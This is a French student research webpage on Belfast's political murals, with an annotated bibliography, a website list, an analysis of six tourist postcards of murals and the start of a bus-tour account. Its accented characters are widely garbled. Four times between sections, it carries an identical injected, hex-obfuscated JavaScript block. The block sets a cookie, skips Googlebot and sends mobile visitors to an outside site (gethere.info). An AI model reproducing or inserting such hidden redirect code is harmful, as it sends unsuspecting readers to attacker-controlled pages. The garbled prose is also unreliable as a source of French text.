Bibliographie et Sitographie intA�grale

Bibliographie

ChA�roux, ClA�ment, Diplopie, Paris, Le Point du Jour, 2009

Cet ouvrage sa��A�tend sur la��utilisation faite par la presse A�tasunienne des images des attentats du 11 septembre 2001. Bien que les thA�matiques et les recherches soient rA�solument diffA�rentes la��une de la��autre, la��ouvrage de la��historien de la photographie ClA�ment ChA�roux nous donne certaines clefs pour penser et aborder la rA�pA�tition da��une image. Il prend la��exemple de la tristement cA�lA?bre photographie de la boule de feu crA�A�e par la��explosion des rA�servoirs da��hydrocarbure de la��avion ayant percutA� la tour sud du World Trade Center, qui est apparue en premiA?re page dans 41% des journaux amA�ricains, entre le 11 et le 12 septembre. Dans une idA�e similaire A� la sienne, nous tenterons da��A�tablir un classement des murals les plus reprA�sentA�s, dans des supports destinA�s aux touristes. De plus, la��ouvrage par son analyse dA�taillA�e, autant des images, que de leurs mise en boucle et du sentiment de dA�jA�-vu les entourant, nous donnes des outils afin d’apprA�hender nos rA�flexions sur la rA�pA�tition da��un motif.

HA�hnel-Mesnard, C., LiA�nard-Yeterian, M., Marinas, C. (dirs), Culture et mA�moire: reprA�sentations contemporaines de la mA�moire dans les espaces mA�moriels, les arts du visuel, la littA�rature et le thA�A?tre., Palaiseau, A�d. A�cole Polytechnique, 2008

Cet ouvrage sa��intA�resse A� la��expression de la mA�moire commune sur divers support, notamment visuel. Ca��est notamment la contribution de Julie Mc Donald et Declan Mc Cavana, A� travers leurs article The Walls of Belfast Speak Louder Than Words qui se rapporte le plus A� notre sujet de recherche. Il se penche en effet sur la question de la��expression de la mA�moire du conflit ayant divisA� la ville, A� travers la��analyse de Murals. Nous avanA�ons en effet la��hypothA?se que les images-types, ca��est A� dire les reprA�sentations les plus frA�quentes des fresques, que nous auront observA�es et dA�finit, seront vraisemblablement fortement liA�e A� la mA�moire de certains A�vA�nements ou certaines personnalitA�s du conflit. Cet ouvrage, et la��article de Mc Donald et Mc Cavana en particulier, nous permettent de comprendre et da��aborder les enjeux de la mA�moire sur un support le visuel.

MFS Press, The Belfast Mural Guide, Belfast, 2014

Ce petit guide de poche est un recueil des murals les plus populaires et de quelques sites en lien avec les Troubles. Il A� l’avantage de les situer prA�cisA�ment et de donner de l’information quant au motif de la fresque. Pourtant, il n’est de loin pas exhaustif. AchetA� dans la trA?s sA�lective boutique rattachA�e au siA?ge de Sinn FA�in, parti politique de l’ancien IRA,A� l’ouvrage prA�sente toutefois desA�murals partisans des deux cA?tA�s du conflit.

Morand, A-C., MA�moire de Belfast ou Le processus de la mise en tourisme de la mA�moire et de leurs expressions spatiales, Exemple appuyA� sur Belfast (Irlande du Nord). MA�moire professionnel sous la direction de Maria Gavari-Barbas, A�Paris, UniversitA� de Paris 1 – PanthA�on Sorbonne, 2008-2009.

Ce mA�moire sa��intA�resse A� la��A�mergence des pratiques touristiques autour des troubles en Irlande du Nord. Anne-CA�line Morand y A�tudie notamment les enjeux autour de la mise en tourisme des tA�moignages du conflit, A� travers la��A�tude de la��offre et de la demande mais aussi des divers discours A�mis par des agents touristique.

 

 


Sitographie

Belfast Murals – http://belfast-murals.co.uk/

Ce site internet rassemble un grand nombre des murals de la ville, qua��il place sur une carte interactive. De plus, il divise les fresques en trois catA�gories: les murals loyalistes, les murals unionistes ainsi que les murals dA�signA�s comme A�tant sociaux ou culturels, qui reprA�sentent les fresques plus rA�centes, gA�nA�ralement mandatA�es par la ville au cours du processus de paix, pour renforcer une identitA� rA�gionale. Ce site internet nous permettra de localiser gA�ographiquement les murals que nous A�tudierons. Na��A�tant toutefois pas toujours trA?s prA�cis, ni absolument complet, il sera utilisA� en alternance avec la��outil Street View de Google.

 var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Interviews dans la rue

[en construction]var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

ConfA�rences

[en construction]var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Cartes postales

Afin de nous faire une idA�e de l’image des murals envoyA�e vers l’extA�rieur, vous avons cherchA�s A� collectionner des cartes postales.

Pourquoi des cartes postales?

En effet, les cartes postales A� vocation touristique sont vendues aux visiteurs dans l’objectif d’A?tre partagA�es avec un rA�seau A�tranger. Ainsi une carte postale doit remplir certaines conditions. PremiA?rement, elle doit procurer au touriste envoyant la carte A� une tierce personne une forme de fiertA�, bien souvent inconsciente. L’envoi de carte postale signifie en effet A�regarde oA? je suis et oA? tu n’es pas!A�, si tel n’A�tait pas le cas, nous nous contenterions de lettre sur papier blanc. L’image reprA�sentA�e doit donc vendre le lieu d’oA? elle provient, afin d’allA�cher le rA�cepteur de la carte.

L’analyse de cartes postales nous est donc apparu comme un moyen de rendre compte de ceux qui, parmi les nombreux murals diffA�rents de Belfast, A�taient jugA�s comme A�tant particuliA?rement reprA�sentatif de ce que la ville a de mieux A� offrir.

On comprend que la carte postale joue un rA?le clef dans l’entretien d’un cercle d’image, puisse qu’elle permettra au visiteur ayant reA�u par le passA� un telle carte, une fois sur place, de rattacher celle-ci A� son expA�rience prA�sente. De part ce « dA�jA�-vu », l’A�lA�ment reprA�sentA�, dans notre cas, un mural, lui apparaA�tra comme A�tant pittoresque1, c’est A� dire digne d’A?tre vu ainsi que d’A?tre photographiA�.

A� Le touriste identifie un lieu […] comme pittoresque parce qu’il l’a dA�jA� vu et qu’il peut le comparer A� ce qu’il connaA�t dA�jA�, soit par son expA�rience, soit grA?ce aux images qui en existentA�2

La rA�colte

Au fil de nos journA�es A� Belfast, nous avons donc traquA�s puis achetA�s les cartes postales comportant des photographies de murals. Nous avons toutefois A�tA� forcA�s de constater que le choix A�tait A�restreint. En une semaine, il nous a A�tA� possible de rA�colter 6 cartes, d’intA�rA?t plus ou moins important pour notre recherche dans des lieux divers. Si nous avons trouvA� la premiA?re dans un supermarchA� alimentaire et deux autres dans un bureau de poste, les trois restantes ont A�tA� achetA�es dans deux magasins de souvenirs diffA�rents.

Les 6 cartes postales prA�sentA�es

La premiA?re carte [fig.1], trouvA�e comme susmentionnA� dans une supermarchA� alimentaire, semble A?tre la plus frA�quente. En effet, nous l’avons aperA�u dans diverses boutiques au fil de notre sA�jour. Huit dA�tails de murals ou fresques en entier y sont reprA�sentA�.

DiffA�rentes figures emblA�matiques en lien avec les Troubles y sont visible: la Reine da��Angleterre [en haut A� gauche], le Duc d’Orange [en haut, 3em A�cusson depuis la gauche], ou encore l’activiste dA�cA�dA� lors d’une grA?ve de la faim et A�rigA� au rang de martyr, Bobby Sands [en bas A� gauche].

Selon nos recherches, la majoritA� des fresques reprA�sentA�es sur cette carte postale ne sont plus existantes: elles ont A�tA� recouvertes ou, A� l’instar de la « Mona Lisa de Shankill » (en bas, 2em A�cusson depuis la gauche), dA�truites rA�cemment.

Les deux cartes suivantes [fig. 3 et fig.4], trouvA�es dans une petite boutique sur Falls Road reprA�sentent des fresques et des dA�tails de fresques situA�es dans west Belfast, notamment du International Peace Wall. Les cartes se positionnent du cA?tA� unioniste du conflit. Ceci peut A?tre interprA�tA� par le choix des motifs prA�sentA�s: plusieurs dA�tails de murals sur les Blanketstrikers [en haut au centre et en bas A� droite de fig.3], avec notamment Kieran Nugent, [au centre de fig.2] premier prisonnier rA�publicain A� se vA?tir de sa couverture, refusant ainsi de porter l’uniforme imposA� aux prisonniers, et revendiquant de la sorte le statut de prisonnier politique3. Mais aussi un tA�moignage de solidaritA� A� la Palestine, particuliA?rement revendiquA� par le cA?tA� rA�publicain [fig.3 en haut A� gauche]. Ainsi que des murals commA�morant divers A�vA?nements ayant marquA� la communautA� catholique en Irlande du Nord, tel que l’attaque du Milltown Cemetery, lors de l’enterrement de trois membres de l’IRA, tuA� A� Gibraltar en 1988 par des soldats de l’armA�e britannique4.

La qualitA� d’impression, le papier utilisA� ainsi que les polices d’A�criture imprimA�es au dos des cartes postales, laissent avancer qu’il s’agit d’une production amateur. La mention A� This postcards are only available in Belfast, at Green’s, Falls Road A� sur le revers de la carte suppose que les cartes sont produites par la boutique qui les vend.

A� This Postcards are only available in Belfast, at Green’s, Falls Road A� Cette inscription au dos des cartes postales nA�2 et nA�3, et notamment l’erreur de terminaison, laisse supposer une production A� A�chelle rA�duite.

Les trois cartes postales restantes comprennent des murals dit « neutres », ne s’inscrivant pas dans le conflit et la pA�riode des troubles. Il s’agit en effet, d’une carte portant sur la thA�matique de l’auteur des Chroniques de Narnia, C. S. Lewis [fig.4], ainsi qu’une deuxiA?me carte [fig.5] reprA�sentant les chantiers navals ayant construit le Titanic.

La derniA?re des cartes [fig.6] sort un peu du lot, car elle donne A� voir l’Ulster de maniA?re plus large. Divers paysages verdoyants y sont reprA�sentA� dans de petits mA�daillons. L’un d’eux, dans la deuxiA?me colonne, reprend un dA�tail de la fresque des chantiers du Titanic. Cet A�lA�ment est le seul qui renvoi A� A�de l’urbain, les autres images reprA�sentant surtout des ruines et de la nature, A� la��exception de la pancarte « Old Bushmills » ainsi que des bateaux.

Observations

Au vue de la difficultA� rencontrA�e A� trouver des cartes postales comprenant des motifs avec tirA� ou reprA�sentant des murals, nous constatons une rA�ticence A�vidente face A� ce type de documents.

Sur les six cartes achetA�es, quatre sont entiA?rement consacrA�e A� des fresques, la sixiA?me [fig.6] ne reprA�sentant qu’un extrait de mural parmi divers motifs.

La moitiA� des cartes rA�coltA�es a pour objet des fresques liA�es aux Troubles [fig.1, fig.2, fig.3], l’autre moitiA� reprA�sentant des murals dit « neutre » [fig.4, fig.5, fig.6]. Des trois cartes postales en lien avec le conflit, deux, [fig.2 et fig.3] soutiennent, par le choix des motifs reprA�sentA�s, l’un des acteurs. De plus, ces deux cartes ne sont pas produites par une agence officielle, A� l’inverse des quartes restantes, mais sont produite de maniA?re amateur.

N.F. – S.P. – L.Z.


1- Gauthier, L., Staszak, J.-F., ClichA�s exotiques, Paris, A�ditions de Monza, 2015, p.59
2- Ibidem
3- MFS Press, The Belfast Mural Guide, Belfast, 2014, p.13
4- Ibidem, p.16

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Double Decker Bus Tour

Le jour de notre arrivA�e A� Belfast, nous nE?avons perdu aucun temps pour commencer notreA�enquA?te. AprA?s avoir dA�posA� nos affaires A� lE?auberge Vagabonds, nous sommes partis faire un tour de la ville en cA�lA?bre bus rouge A� deux A�tages de Hop On Hop Off. MalgrA� le temps gris, venteux et trA?s froid, bon nombre da��entre nous sont montA�s en haut pour vivre lE?expA�rience culte du bus impA�riale.

